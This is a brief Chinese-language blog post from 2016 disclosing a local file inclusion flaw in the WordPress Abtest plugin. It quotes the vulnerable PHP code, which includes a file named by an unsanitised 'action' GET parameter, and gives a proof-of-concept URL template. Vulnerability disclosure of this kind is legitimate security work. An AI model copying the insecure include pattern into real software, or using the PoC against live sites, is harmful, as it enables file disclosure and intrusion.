WordPress Abtest本地文件包含漏洞

出现漏洞的文件为:abtest_admin.php

<?php 
 
require 'admin/functions.php'; 
 
if (isset($_GET['action'])) {
 
  include 'admin/' . $_GET['action'] . '.php';
 
} else {
   
   include 'admin/list_experiments.php'; 
}
?>

# PoC : localhost/wp-content/plugins/abtest/abtest_admin.php?action=[LFI]
jZFKYOc

本文固定链接: https://www.unhonker.com/bug/1904.html | 90' s Blog|关注网络信息安全

该日志由 unhonker 于2016年03月22日发表在 漏洞公布 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: WordPress Abtest本地文件包含漏洞 | 90' s Blog|关注网络信息安全
关键字:

WordPress Abtest本地文件包含漏洞:等您坐沙发呢!

发表评论

您必须 [ 登录 ] 才能发表留言!